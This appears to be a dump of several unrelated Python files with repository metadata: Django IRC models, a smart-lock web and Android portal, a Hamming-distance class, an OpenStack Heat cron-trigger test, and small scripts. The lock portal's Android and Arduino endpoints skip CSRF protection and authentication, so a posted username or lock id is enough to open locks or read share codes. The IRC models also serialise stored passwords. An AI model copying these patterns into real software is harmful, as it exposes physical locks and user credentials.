    label = CharField(max_length=256, default="My IRC Server")
    username = CharField(max_length=256)
    password = CharField(max_length=256, null=True, blank=True)
    nickname = CharField(max_length=256)
    realname = CharField(max_length=256, null=True, blank=True)

    def to_dict(self):
        """
        Dictify user-server association (foreign keys as id strings)
        """
        return {
            'id': str(self.id),
            'user': str(self.user_id),
            'server': str(self.server_id),
            'label': self.label,
            'username': self.username,
            'password': self.password,
            'nickname': self.nickname,
            'realname': self.realname,
        }

    def __str__(self):
        return "%s - %s" % (self.user, self.server)

    def __repr__(self):
        return "<UserServer: %s>" % self.__str__()
class Channel(Model):
    """A named channel belonging to a Server."""
    id = UUIDField(primary_key=True, default=uuid4, editable=False)
    server = ForeignKey(Server, related_name="channels")
    name = CharField(max_length=256)

    def to_dict(self):
        """
        Dictify channel
        """
        return {
            'id': str(self.id),
            'server': str(self.server_id),
            'name': self.name,
        }

    def __str__(self):
        return "%s - %s" % (self.server, self.name)

    def __repr__(self):
        return "<Channel: %s>" % self.__str__()
class UserChannel(Model):
    """A user's membership in a Channel (via their UserServer connection)."""
    id = UUIDField(primary_key=True, default=uuid4, editable=False)
    user_server = ForeignKey(
        UserServer, related_name="user_channels", null=True)
    channel = ForeignKey(Channel, related_name="user_channels")
    nickname = CharField(max_length=256)
    password = CharField(max_length=256, null=True, blank=True)
    mode = CharField(max_length=16, null=True, blank=True)

    def to_dict(self):
        """
        Dictify channel membership (foreign keys as id strings)
        """
        return {
            "id": str(self.id),
            "userServer": str(self.user_server_id),
            "channel": str(self.channel_id),
            "nickname": self.nickname,
            "password": self.password,
            "mode": self.mode,
        }

    def to_dict_deep(self):
        """
        Deep `to_dict`: embeds the related UserServer and Channel dicts
        instead of their id strings.
        """
        d = self.to_dict()
        d['userServer'] = self.user_server.to_dict()
        d['channel'] = self.channel.to_dict()
        return d

    def __str__(self):
        return "%s - %s" % (self.channel, self.nickname)

    def __repr__(self):
        return "<UserChannel: %s>" % self.__str__()
class BaseMessage(Model):
    """Abstract base for message models: text plus creation timestamp."""
    id = UUIDField(primary_key=True, default=uuid4, editable=False)
    text = TextField()
    created_on = DateTimeField(auto_now_add=True)

    def to_dict(self):
        """
        Dictify the common message fields; subclasses extend this dict.
        """
        return {
            'id': str(self.id),
            'text': self.text,
            'createdOn': self.created_on,
        }

    class Meta:
        # Abstract: no table is created for this model itself.
        abstract = True
class Message(BaseMessage):
    """A message posted to a channel by a channel member."""
    channel = ForeignKey(Channel, related_name="messages")
    user_channel = ForeignKey(UserChannel, related_name="messages")

    def to_dict(self):
        """
        Dictify message: base fields plus channel/membership id strings.
        """
        d = super(Message, self).to_dict()
        d.update({
            'channel': str(self.channel_id),
            'userChannel': str(self.user_channel_id),
        })
        return d

    def __str__(self):
        return "%s" % self.text

    def __repr__(self):
        return "<Message: %s>" % self.__str__()
class Conversation(Model):
    """A private conversation between two channel memberships."""
    id = UUIDField(primary_key=True, default=uuid4, editable=False)
    user_channel_1 = ForeignKey(UserChannel, related_name='+')
    user_channel_2 = ForeignKey(UserChannel, related_name='+')

    def to_dict(self):
        """
        Dictify Conversation
        """
        return {
            'id': str(self.id),
            'userChannel1': str(self.user_channel_1_id),
            'userChannel2': str(self.user_channel_2_id),
        }

    def __str__(self):
        return "%s - %s" % (self.user_channel_1_id, self.user_channel_2_id)

    def __repr__(self):
        return "<Conversation: %s>" % self.__str__()
class PrivateMessage(BaseMessage):
    """A message inside a Conversation, with a read/unread flag."""
    conversation = ForeignKey(Conversation, related_name='private_messages')
    user_channel = ForeignKey(UserChannel, related_name='private_messages')
    read = BooleanField(default=False)

    def to_dict(self):
        """
        Dictify private message: base fields plus conversation/sender ids
        and the read flag.
        """
        d = super(PrivateMessage, self).to_dict()
        d.update({
            'conversation': str(self.conversation_id),
            'userChannel': str(self.user_channel_id),
            'read': self.read,
        })
        return d

    def __repr__(self):
        return "<PrivateMessage: %s>" % self.__str__()
| [
"dhilipsiva@gmail.com"
] | dhilipsiva@gmail.com |
cce44f1ce3d2f6c45026ee3cdcd05c3497af1f7c | 6acf3492182e31cf837c281e3fa96826f7f8782a | /portal/.~c9_invoke_7yV7Ix.py | bb4ace26e21ccdd625ae313510f73e6630086714 | [] | no_license | andreibratu/lockeebackend | 3ce3970f63dd541275c8650b2804d4f72c568521 | 3df3619738876eddc84fc749b8d6a50aecea1624 | refs/heads/working | 2020-05-21T20:45:54.276674 | 2016-11-24T16:34:31 | 2016-11-24T16:34:31 | 65,299,393 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,669 | py | from django.core.urlresolvers import reverse
from django.views.decorators.csrf import csrf_exempt
from django.views.generic.list import ListView
from random import choice
from string import ascii_uppercase
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.http import HttpResponse
from django.shortcuts import render, redirect
from django.views.generic import View
from forms import ShareIDOpen, UserReg, UserLogin, AddLock, VerifyAndroid, AndroidOpenLock, AndroidGetLocks, AndroidLogin, AndroidRegister, AndroidAddLock, AndroidGenerateCode
from django.contrib.auth.mixins import LoginRequiredMixin
from portal.models import Owner, LockAbsVal, Lock
from django.shortcuts import render_to_response
from django.template import RequestContext
import json
# SERVER SIDE ####
def handler404(request):
    """Render the custom 404 page with the matching HTTP status code."""
    response = render_to_response('portal/404.html', {},
                                  context_instance=RequestContext(request))
    response.status_code = 404
    return response
def handler500(request):
    """Render the custom 500 page with the matching HTTP status code."""
    response = render_to_response('portal/500.html', {},
                                  context_instance=RequestContext(request))
    response.status_code = 500
    return response
def web_welcome(request):
    """This view displays the welcome page."""
    # Already-authenticated users skip the welcome page and go straight home.
    if request.user.is_authenticated():
        return redirect('portal:home')
    return render(request, 'portal/welcome.html', {})
def web_register(request):
    """This view handles the register requests on the web client."""
    form_class = UserReg
    register_form = form_class(request.POST)
    if request.method == 'POST':
        if register_form.is_valid():
            new_user = User()
            username = register_form.cleaned_data['usermail']
            password = register_form.cleaned_data['password']
            name = register_form.cleaned_data['name']
            try:
                # Existence probe: success means the username is taken.
                duplicate_check = User.objects.get(username = username)
                return render(request,
                    'portal/welcome.html', {'error': 'Username already registered'})
            except User.DoesNotExist:
                # Create the user plus its Owner record, then log in directly.
                new_user.username = username
                new_user.set_password(password)
                new_user.first_name = name
                new_user.save()
                new_owner = Owner(owner = new_user)
                new_owner.save()
                user = authenticate(username=username, password=password)
                login(request, user)
                return redirect('portal:home')
        else:
            return render(request, 'portal/welcome.html', {'error': 'Invalid register form'})
    else:
        # Non-POST access is not allowed on this endpoint.
        return render(request, 'portal/forbidden.html', {})
def web_login(request):
    """This view handles the login request on the web client."""
    form_class = UserLogin
    login_form = form_class(request.POST)
    if request.method == 'POST':
        if login_form.is_valid():
            username = login_form.cleaned_data['usermail']
            password = login_form.cleaned_data['password']
            user = authenticate(username=username, password=password)
            if user is not None:
                if user.is_active:
                    login(request, user)
                    return redirect('portal:home')
                else:
                    return render(request, 'portal/welcome.html', {'error': 'Inactive user'})
            else:
                return render(request, 'portal/welcome.html', {'error': 'Invalid credentials'})
        else:
            return render(request, 'portal/welcome.html', {'error': 'Invalid login form'})
    else:
        return render(request, 'portal/forbidden.html', {})
@login_required(login_url='portal:welcome')
def web_display_locks(request, message=''):
    """Render the home page listing the logged-in user's locks.

    `message` is shown in the template's 'error' slot (also used for
    success notices by the other views that delegate here).
    """
    what_owner = Owner.objects.get(owner=request.user)
    locks_of_logged_in_user = what_owner.locks.all()
    return render(request, 'portal/home.html', {'object_list': locks_of_logged_in_user, 'error': message})
@login_required(login_url='portal:welcome')
def web_add_lock(request):
    """This function submits the form for DB processing."""
    form_class = AddLock
    form = form_class(request.POST)
    if request.method == 'POST':
        if form.is_valid():
            error=''
            lock_inner_id = form.cleaned_data['lockcode']
            nickname = form.cleaned_data['lockname']
            orientation = form.cleaned_data['orientation']
            owner = Owner.objects.get(owner=request.user)
            try:
                abs_lock = LockAbsVal.objects.get(lock_inner_id=lock_inner_id)
                try:
                    # Reject if this owner already registered the same lock.
                    lock_already_added = owner.locks.get(abs_lock=abs_lock)
                    error = 'You have already added this lock'
                except Lock.DoesNotExist:
                    try:
                        # Reject if the nickname is already in use by this owner.
                        nickname_already_used = owner.locks.get(nickname=nickname)
                        error = 'You have already used this nickname'
                    except Lock.DoesNotExist:
                        # All checks passed: persist orientation, create the
                        # relative Lock and attach it to the owner.
                        abs_lock.orientation = orientation
                        abs_lock.save()
                        new_lock = Lock(abs_lock=abs_lock, nickname=nickname)
                        new_lock.save()
                        owner.locks.add(new_lock)
                        owner.save()
                        return web_display_locks(request, message='Lock added sucessfully')
            except LockAbsVal.DoesNotExist:
                error = 'The Lock Does Not Exist'
            # Fall through with whichever error message was set above.
            return web_display_locks(request, error)
        else:
            return HttpResponse('bad form')
    else:
        return render(request, 'portal/forbidden.html', {})
@login_required(login_url='portal:login')
def web_logout(request):
    """This view logs the user out."""
    logout(request)
    return render(request, 'portal/welcome.html', {})
@login_required(login_url='portal:login')
def web_generate_code(request, lock_nickname):
    """This view generates a new share code at user's demand."""
    logged_in_owner = Owner.objects.get(owner=request.user)
    lock_to_change = logged_in_owner.locks.get(nickname=lock_nickname)
    # Rebuild the share id as 11 random uppercase letters.
    lock_to_change.share_id = ''
    for i in range(0, 11):
        lock_to_change.share_id += choice(ascii_uppercase)
    lock_to_change.save()
    logged_in_owner.save()
    message = "Here's the new share code for %s" % lock_nickname
    return web_display_locks(request, message)
@login_required(login_url='portal:login')
def web_profile(request):
    """This view handles the user's profile on the web site."""
    return render(request, 'portal/profile.html', {'name': request.user.first_name})
def web_about(request):
    """This view presents the details of this project's godlike developers."""
    return render(request, 'portal/about.html', {})
@login_required(login_url='portal:login')
def web_portal_mechanic(request, lock_inner_id, lock_nickname):
    """Toggle a lock's open/closed state via the website.

    Flips LockAbsVal.is_opened, persists it, and re-renders the lock list
    with a confirmation message. (The original had two duplicated branches
    plus an unreachable trailing `return HttpResponse(...)`; both branches
    are collapsed into a single toggle with identical messages.)
    """
    what_lock = LockAbsVal.objects.get(lock_inner_id=lock_inner_id)
    what_lock.is_opened = not what_lock.is_opened
    what_lock.save()
    state = "opened" if what_lock.is_opened else "closed"
    message = "%s is now %s" % (lock_nickname, state)
    return web_display_locks(request, message)
@login_required(login_url='portal:login')
def web_delete_lock(request, nickname):
    """This view deletes a relative_lock from the owner's list."""
    owner = Owner.objects.get(owner=request.user)
    owner.locks.get(nickname=nickname).delete()
    message = "%s has been removed from the list" % nickname
    return web_display_locks(request, message)
# ANDROID SIDE ###
@csrf_exempt
def android_login(request):
    """This view handles the login requests that come from the android terminal."""
    if request.method == 'POST':
        form = AndroidLogin(request.POST)
        if form.is_valid():
            username = form.cleaned_data['username']
            password = form.cleaned_data['password']
            # Credentials are only validated; no web session is created.
            user = authenticate(username=username, password=password)
            if user is not None:
                return HttpResponse('login success')
            else:
                return HttpResponse('fail')
        else:
            return HttpResponse('Form Error')
    else:
        return render(request, 'portal/forbidden.html', {})
@csrf_exempt
def android_register(request):
    """This view handles the register requests that come from the an android terminal."""
    if request.method == 'POST':
        form = AndroidRegister(request.POST)
        if form.is_valid():
            new_user = User()
            username = form.cleaned_data['username']
            password = form.cleaned_data['password']
            full_name = form.cleaned_data['name']
            # NOTE(review): no duplicate-username check here, unlike
            # web_register; availability is checked separately by
            # android_verify before this endpoint is called.
            new_user.username = username
            new_user.set_password(password)
            new_user.first_name = full_name
            new_user.save()
            create_owner = Owner(owner=new_user)
            create_owner.save()
            return HttpResponse('register success')
        else:
            return HttpResponse('form fail')
    else:
        return render(request, 'portal/forbidden.html', {})
@csrf_exempt
def android_verify(request):
    """This view helps the android terminal check username availability in real time."""
    if request.method == 'POST':
        form = VerifyAndroid(request.POST)
        if form.is_valid():
            username = form.cleaned_data['username']
            try:
                # Existence probe only; the fetched object is discarded.
                User.objects.get(username=username)
                return HttpResponse('email already taken')
            except User.DoesNotExist:
                return HttpResponse('verify success')
        else:
            return HttpResponse('wow')
    else:
        return render(request, 'portal/forbidden.html', {})
@csrf_exempt
def android_mechanic(request):
    """This view opens/closes a lock via an android terminal."""
    if request.method == 'POST':
        form = AndroidOpenLock(request.POST)
        if form.is_valid():
            lock_inner_id = form.cleaned_data['lock_inner_id']
            try:
                what_lock = LockAbsVal.objects.get(lock_inner_id=lock_inner_id)
                # Toggle the persisted state and tell the client the result.
                if what_lock.is_opened:
                    what_lock.is_opened = False
                    response = 'locked'
                else:
                    what_lock.is_opened = True
                    response = 'unlocked'
                what_lock.save()
                return HttpResponse(response)
            except LockAbsVal.DoesNotExist:
                # Unknown lock: echo the id back to the client.
                return HttpResponse(lock_inner_id)
        else:
            return HttpResponse('bad form')
    else:
        return render(request, 'portal/forbidden.html', {})
@csrf_exempt
def android_locks_query(request):
    """This view sends to the android terminal the locks the user has access to,
    serialized as JSON under the 'locks_info' key."""
    if request.method == 'POST':
        form = AndroidGetLocks(request.POST)
        if form.is_valid():
            username = form.cleaned_data['username']
            try:
                logged_user = User.objects.get(username=username)
                logged_owner = Owner.objects.get(owner=logged_user)
                try:
                    user_locks = logged_owner.locks.all()
                    lock_info = {'locks_info': [{'nickname': lock.nickname, 'lock_inner_id': lock.abs_lock.lock_inner_id, 'share_id': lock.share_id, 'status': lock.abs_lock.is_opened} for lock in user_locks]}
                    json_response = json.dumps(lock_info)
                    return HttpResponse(json_response)
                except Lock.DoesNotExist:
                    # No locks registered for this owner.
                    return HttpResponse('0')
            except User.DoesNotExist:
                return HttpResponse('unknown user')
        else:
            return HttpResponse('form error')
    else:
        return render(request, 'portal/forbidden.html', {})
@csrf_exempt
def android_ping(request):
    """This lets the Android client ping the server to try server connection."""
    if request.method == 'GET':
        return HttpResponse('received')
    else:
        return render(request, 'portal/forbidden.html', {})
@csrf_exempt
def android_add_lock(request):
    """Allows the android terminal to add a lock into the DB."""
    if request.method == "POST":
        form = AndroidAddLock(request.POST)
        if form.is_valid():
            username = form.cleaned_data['username']
            lock_inner_id = form.cleaned_data['lock_inner_id']
            nickname = form.cleaned_data['nickname']
            orientation = form.cleaned_data['orientation']
            # NOTE(review): this lookup is outside the try below, so an
            # unknown username raises instead of hitting the
            # User.DoesNotExist handler — confirm intended.
            the_user = User.objects.get(username=username)
            try:
                # Probe that the physical lock exists at all.
                lock_validity = LockAbsVal.objects.get(lock_inner_id=lock_inner_id)
                try:
                    owner = Owner.objects.get(owner=the_user)
                    try:
                        # Reject a nickname this owner already uses.
                        duplicate_nickname_check = owner.locks.get(nickname=nickname)
                        return HttpResponse('nickname already used')
                    except Lock.DoesNotExist:
                        abs_lock = LockAbsVal.objects.get(lock_inner_id=lock_inner_id)
                        try:
                            # Reject a lock this owner already registered.
                            abs_lock_already_added_check = owner.locks.get(abs_lock=abs_lock)
                            return HttpResponse('this lock was already registered')
                        except Lock.DoesNotExist:
                            # All checks passed: persist orientation and
                            # attach the new relative Lock to the owner.
                            abs_lock.orientation = orientation
                            abs_lock.save()
                            new_lock = Lock(abs_lock=abs_lock, nickname=nickname)
                            new_lock.save()
                            owner.locks.add(new_lock)
                            owner.save()
                            return HttpResponse('lock registered')
                except User.DoesNotExist:
                    return HttpResponse('user does not exist')
            except LockAbsVal.DoesNotExist:
                return HttpResponse('lock does not exist')
        else:
            return HttpResponse('invalid form')
    else:
        return render(request, 'portal/forbidden.html', {})
@csrf_exempt
def android_generate_code(request):
    """This view generates a new share code at user's demand on android terminal."""
    if request.method == 'POST':
        form = AndroidGenerateCode(request.POST)
        if form.is_valid():
            nickname = form.cleaned_data['nickname']
            username = form.cleaned_data['username']
            what_user = User.objects.get(username=username)
            logged_in_owner = Owner.objects.get(owner=what_user)
            lock_to_change = logged_in_owner.locks.get(nickname=nickname)
            # Rebuild the share id as 11 random uppercase letters
            # (same scheme as web_generate_code).
            lock_to_change.share_id = ''
            for i in range(0, 11):
                lock_to_change.share_id += choice(ascii_uppercase)
            lock_to_change.save()
            logged_in_owner.save()
            return HttpResponse(lock_to_change.share_id)
        else:
            return HttpResponse('bad form')
    else:
        return render(request, 'portal/forbidden.html', {})
@csrf_exempt
def android_profile(request):
    """Return the given user's full name to the android terminal.

    Bug fix: the original read ``User.first_name`` (the model *class*
    attribute, a field descriptor) instead of the fetched user instance's
    first name, so the response never contained the actual name.
    """
    if request.method == 'POST':
        form = VerifyAndroid(request.POST)
        if form.is_valid():
            username = form.cleaned_data['username']
            try:
                what_user = User.objects.get(username=username)
                return HttpResponse(what_user.first_name)
            except User.DoesNotExist:
                return HttpResponse('user does not exist')
        else:
            return HttpResponse('wow')
    else:
        return render(request, 'portal/forbidden.html', {})
@csrf_exempt
def android_remove(request):
    """Allows removal of locks from android terminal.

    Bug fix: the Lock.DoesNotExist branch contained a stray
    ``def android_open_sharecode(request)`` line (a syntax error left over
    from an edit); it is replaced by an error response, mirroring the
    'user error' response of the sibling handler.
    """
    if request.method == 'POST':
        form = AndroidGenerateCode(request.POST)
        if form.is_valid():
            username = form.cleaned_data['username']
            nickname = form.cleaned_data['nickname']
            try:
                what_user = User.objects.get(username=username)
                owner = Owner.objects.get(owner=what_user)
                try:
                    owner.locks.get(nickname=nickname).delete()
                    return HttpResponse('success')
                except Lock.DoesNotExist:
                    return HttpResponse('lock error')
            except User.DoesNotExist:
                return HttpResponse('user error')
        else:
            return HttpResponse('bad form')
    else:
        return render(request, 'portal/forbidden.html', {})
@csrf_exempt
def android_open_sharecode(request):
    """Toggle a lock open/closed by its share_id from an android terminal.

    Bug fix: the original mutated ``what_lock.abs_lock.is_opened`` but then
    called ``what_lock.save()`` (saving the relative Lock row), so the state
    change on LockAbsVal was never persisted. The other mechanic views
    (web_portal_mechanic, android_mechanic) save the LockAbsVal itself; this
    now does the same. An explicit 'bad form' response is also returned for
    invalid forms instead of falling through to an implicit None.
    """
    if request.method == 'POST':
        form = ShareIDOpen(request.POST)
        if form.is_valid():
            shareID = form.cleaned_data['shareID']
            try:
                what_lock = Lock.objects.get(share_id=shareID)
                abs_lock = what_lock.abs_lock
                if abs_lock.is_opened:
                    abs_lock.is_opened = False
                    abs_lock.save()
                    return HttpResponse('closed')
                else:
                    abs_lock.is_opened = True
                    abs_lock.save()
                    return HttpResponse('opened')
            except Lock.DoesNotExist:
                return HttpResponse('bad code')
        else:
            return HttpResponse('bad form')
    else:
        return render(request, 'portal/forbidden.html', {})
# ARDUINO SIDE
@csrf_exempt
def arduino_mechanic(request):
    """This view is pinged by the arduino clients to check for changes in db ( every 1 sec )"""
    if request.method == 'POST':
        # The raw request body carries the lock's inner id.
        lock_inner_id = request.body
        try:
            already_registered_lock = LockAbsVal.objects.get(lock_inner_id=lock_inner_id)
            is_opened = already_registered_lock.is_opened
            # '#'-prefixed keywords are the protocol understood by the arduino.
            if is_opened:
                return HttpResponse('#unlocked')
            else:
                return HttpResponse('#locked')
        except LockAbsVal.DoesNotExist:
            # First contact from an unknown lock: auto-register it.
            new_registration_lock = LockAbsVal(lock_inner_id=lock_inner_id)
            new_registration_lock.save()
            return HttpResponse('new lock registered')
    else:
        return render(request, 'portal/forbidden.html', {})
"bratu.andrei@outlook.com"
] | bratu.andrei@outlook.com |
784226429847848c20d7ff49b864ec51605e29f3 | 35a4c50eb161a402e8f3bbc3fe2bd75f77d757cb | /src/zad1/hamming.py | e42b9438146cde66c5eeae03c44707bd57a954dd | [] | no_license | TestowanieAutomatyczneUG/laboratorium-5-Grzeskii | de6c85a4eb0ad95b6d7d84ce125f0186c7960ddf | a3379356a0560ebf1b7b9c5225d7006d7e3dd5d2 | refs/heads/master | 2023-01-04T22:53:30.719255 | 2020-11-03T19:16:58 | 2020-11-03T19:16:58 | 309,400,055 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 319 | py | class Hamming:
def distance(first, second):
numberOfErrors = 0
if len(first) != len(second):
raise ValueError("Strands should be the same length")
for i in range(len(first)):
if first[i] != second[i]:
numberOfErrors += 1
return numberOfErrors | [
"grzegorz.rzeski@autonomik.pl"
] | grzegorz.rzeski@autonomik.pl |
a26020ee941b2c90838334df8971da6794fecc60 | f4a586996c4e7ba508abcd17bb3279f25cb8a384 | /samples/__init__.py | 50420bdbb2ff11693fa54dd5f9a9663047cf3767 | [] | no_license | 750584261/api_test_frame | 7183b04d6aa9d64e2d73b1e12ff6fc9f50288d3d | 0ca8b04a08e9605a72da7a8f43454362585be9f9 | refs/heads/master | 2023-03-09T22:41:53.643478 | 2021-02-23T11:09:01 | 2021-02-23T11:09:01 | 341,520,202 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 108 | py | """
-*- coding: utf-8 -*-
@datetime : 2021/2/23 19:08:24
@Author : wenbin
@File       : __init__.py
"""
| [
"750584261@qq.com"
] | 750584261@qq.com |
86c9b86af42f911790b3c9a9171e90b2a3a6d5ab | 6b8c3974d3ce5f7841e51dcb406666c0c5d92155 | /heat/heat/tests/mistral/test_mistral_cron_trigger.py | f675a7962563de8a3c4633e373b00471eb251b3b | [
"Apache-2.0"
] | permissive | swjang/cloudexchange | bbbf78a2e7444c1070a55378092c17e8ecb27059 | c06ed54f38daeff23166fb0940b27df74c70fc3e | refs/heads/master | 2020-12-29T03:18:43.076887 | 2015-09-21T07:13:22 | 2015-09-21T07:13:22 | 42,845,532 | 1 | 1 | null | 2015-09-21T07:13:22 | 2015-09-21T05:19:35 | C++ | UTF-8 | Python | false | false | 4,428 | py | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from heat.common import template_format
from heat.engine import resources
from heat.engine.resources.openstack.mistral import cron_trigger
from heat.engine import scheduler
from heat.tests import common
from heat.tests import utils
stack_template = '''
heat_template_version: 2013-05-23
resources:
cron_trigger:
type: OS::Mistral::CronTrigger
properties:
name: my_cron_trigger
pattern: "* * 0 * *"
workflow: {'name': 'get_first_glance_image', 'input': {} }
count: 3
first_time: "2015-04-08 06:20"
'''
class FakeCronTrigger(object):
    """Stand-in for a cron trigger object returned by the mistral client."""

    def __init__(self, name):
        """Create a fake trigger with fixed schedule data and the given name."""
        self._data = {'trigger': 'info'}
        self.name = name
        self.remaining_executions = 3
        self.next_execution_time = '2015-03-01 00:00:00'
class MistralCronTriggerTestResource(cron_trigger.CronTrigger):
    """CronTrigger subclass whose service-availability check always passes."""

    @classmethod
    def is_service_available(cls, context):
        # Bypass the real availability check so tests never skip the resource.
        return True
class MistralCronTriggerTest(common.HeatTestCase):
    """Tests for the OS::Mistral::CronTrigger resource plugin."""

    def setUp(self):
        super(MistralCronTriggerTest, self).setUp()
        resources.initialise()
        utils.setup_dummy_db()
        self.ctx = utils.dummy_context()

        # Parse the module-level template and pull out the trigger definition.
        t = template_format.parse(stack_template)
        self.stack = utils.parse_stack(t)
        resource_defns = self.stack.t.resource_definitions(self.stack)
        self.rsrc_defn = resource_defns['cron_trigger']

        # Replace the mistral client with a mock for every resource instance.
        self.client = mock.Mock()
        self.patchobject(MistralCronTriggerTestResource, 'client',
                         return_value=self.client)

    def _create_resource(self, name, snippet, stack):
        """Create the resource and verify the create() call arguments."""
        ct = MistralCronTriggerTestResource(name, snippet, stack)
        self.client.cron_triggers.create.return_value = FakeCronTrigger(
            'my_cron_trigger')
        self.client.cron_triggers.get.return_value = FakeCronTrigger(
            'my_cron_trigger')
        scheduler.TaskRunner(ct.create)()
        # Keyword arguments passed to the mocked client must match the
        # template's properties.
        args = self.client.cron_triggers.create.call_args[1]
        self.assertEqual('* * 0 * *', args['pattern'])
        self.assertEqual('get_first_glance_image', args['workflow_name'])
        self.assertEqual({}, args['workflow_input'])
        self.assertEqual('2015-04-08 06:20', args['first_time'])
        self.assertEqual(3, args['count'])
        self.assertEqual('my_cron_trigger', ct.resource_id)
        return ct

    def test_create(self):
        ct = self._create_resource('trigger', self.rsrc_defn, self.stack)
        expected_state = (ct.CREATE, ct.COMPLETE)
        self.assertEqual(expected_state, ct.state)

    def test_resource_mapping(self):
        mapping = cron_trigger.resource_mapping()
        self.assertEqual(1, len(mapping))
        self.assertEqual(cron_trigger.CronTrigger,
                         mapping['OS::Mistral::CronTrigger'])

    def test_attributes(self):
        # Attribute values come from the FakeCronTrigger returned by get().
        ct = self._create_resource('trigger', self.rsrc_defn, self.stack)
        self.assertEqual('2015-03-01 00:00:00',
                         ct.FnGetAtt('next_execution_time'))
        self.assertEqual(3, ct.FnGetAtt('remaining_executions'))
        self.assertEqual({'trigger': 'info'}, ct.FnGetAtt('show'))

    def test_delete(self):
        ct = self._create_resource('trigger', self.rsrc_defn, self.stack)
        scheduler.TaskRunner(ct.delete)()
        self.assertEqual((ct.DELETE, ct.COMPLETE), ct.state)
        self.client.cron_triggers.delete.assert_called_once_with(
            ct.resource_id)

    def test_delete_not_found(self):
        # Deleting an already-gone trigger (404 from the API) must still
        # complete successfully.
        ct = self._create_resource('trigger', self.rsrc_defn, self.stack)
        self.client.cron_triggers.delete.side_effect = (
            self.client.mistral_base.APIException(error_code=404))
        scheduler.TaskRunner(ct.delete)()
        self.assertEqual((ct.DELETE, ct.COMPLETE), ct.state)
        self.client.cron_triggers.delete.assert_called_once_with(
            ct.resource_id)
| [
"kiku4@kinx.net"
] | kiku4@kinx.net |
87f90331cdb3d4c5fd43445499bf8c27fe2d3f42 | 4142e25e9f6ece5b6192af9b6f237d096ceab9da | /Python школа(2017-2020)/V.py | 9bd5ce9207d0b0d41f27ae85ac741d91383fad8c | [] | no_license | Sergtrf/Sergey-Trofimov | ad007ad175356ad9f2c5d9e555635301db6c4c9b | 660a5ae04ee915fb593728371c9e3bba80f45002 | refs/heads/master | 2023-04-08T23:54:31.983866 | 2021-04-23T06:41:30 | 2021-04-23T06:41:43 | 357,283,338 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 444 | py | n = int(input())
# NOTE(review): this dump lost the original indentation; the nesting below is
# a best-effort reconstruction (inner while with a while-else that resets b)
# — confirm against the original file before relying on it.
# Reads n from input (on the preceding line) and counts combinations of
# denominations; a iterates over 10s, b over 5s. c/c2 and d/d2 are unused.
a = n//10
b=b2 = n//5
c=c2 = n//2
d=d2 = n
summa = 0
while a != -1:
    p = n-a*10
    if p == 0:
        summa += 1
        a -= 1
    else:
        a -= 1
        while b != -1:
            p2 = p-b*5
            if p2 == 0:
                summa += 1
                b -= 1
            else:
                b -= 1
                if p2 > 0:
                    # Remaining amount covered by 2s: 1 + p2//2 variants.
                    summa += 1+p2//2
        else:
            # Loop finished without break: reset b for the next outer pass.
            b = b2
print(summa)
"sergey.trof@rambler.ru"
] | sergey.trof@rambler.ru |
cccdf7bf02ce1fe0653afcbb0717a261450c2508 | ac0407195ea50e94731e413ba79faf3a4ad302a4 | /cadena-garcia-jesus-angel/5parte.py | e1e98332432ae357a177b46a2909202d1b494538 | [] | no_license | Yaevine/Python_practice_AOFI_1718 | e72539d048df20c87b9393068139bb133cb5d616 | e779a0f5183a2bd411cf27eb35148837292be80e | refs/heads/master | 2020-03-08T09:42:47.243264 | 2018-04-20T13:40:10 | 2018-04-20T13:40:10 | 128,053,639 | 0 | 0 | null | 2018-04-04T11:38:22 | 2018-04-04T11:38:21 | null | UTF-8 | Python | false | false | 618 | py | import time
# Initialise the working variables. (Original comments were in Spanish;
# translated here. User-facing prompt strings are kept in Spanish.)
numerotabla =0
numerocambiante=0
resultado = numerotabla * numerocambiante
menu = "si"
# Ask which multiplication table the user wants; repeat while they answer "si".
while menu=="si":
    numerotabla = int(input("Dime que tabla de multiplicar quieres saber del 0 al 10\n"))
    for numerocambiante in range (11):
        resultado = numerotabla * numerocambiante
        print (numerotabla, "por", numerocambiante, "=",resultado)
        # Short pause so the table prints line by line.
        time.sleep(0.5)
    menu = input("¿Quieres saber otra tabla de múltiplicar? ( si/no)\n")
    if menu!= "si":
        print("Nos vemos cuando quieras aprender más :D")
"Yaevine@gmail.com"
] | Yaevine@gmail.com |
bccb0b570fccfc2911fac4309cd83476c3f3e223 | 916787ad51d5847f207fff9405768e6182daeb32 | /AndesControllerLib/bkp/0/sequencer.py | c72e52852d4874d5faf79044031772829228c860 | [] | no_license | NoelGaspar/usb_code | 27dfb0a47bc6e80cd3b97c1501b958d2072028e7 | 3315b5e318877cf8accba2205615ca220dd609da | refs/heads/master | 2021-09-08T05:35:19.647600 | 2018-03-07T17:41:41 | 2018-03-07T17:41:41 | 111,578,363 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,361 | py | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
## @package sequencer
#
# Generation SciCam's sequencer programs.
#
# This module exposes the ProgramBuilder class to generate SciCam sequencer programs.
import log as log;
import six as six;
## An already compiled SciCam sequencer program.
# @note For read-only use. To build programs use ProgramBuilder
class Program:
    ## Initializes a compiled program.
    # @note Do not call directly, use ProgramBuilder instead.
    #
    # @param self An instance of Program
    # @param codes ([int...]) Binary value of the memory to be written at each index.
    # @param mode_addresses ({str:int...}) Cache of the program's modes location.
    # @param modes ([sequencer.Mode]) Source modes of the program compiled in codes.
    # @param log (log._Log) The logging context
    def __init__(self, codes, mode_addresses, modes, log=log.get_default_context()):
        self.codes = codes;
        self.address_map = mode_addresses;
        self.modes = modes;
        self.log = log;
    ## Get the location in memory of a mode
    #
    # @param self An instance of Program
    # @param mode (str) Name of the mode.
    #
    # @returns The address (int) of the mode.
    def get_address(self, mode):
        return self.address_map[mode];
    ## Returns a string of the program contents.
    #
    # If labels is provided, state pin names are included.
    #
    # @param self An instance of Program
    # @param labels ({str:int}) Name of the sequencer pins.
    #
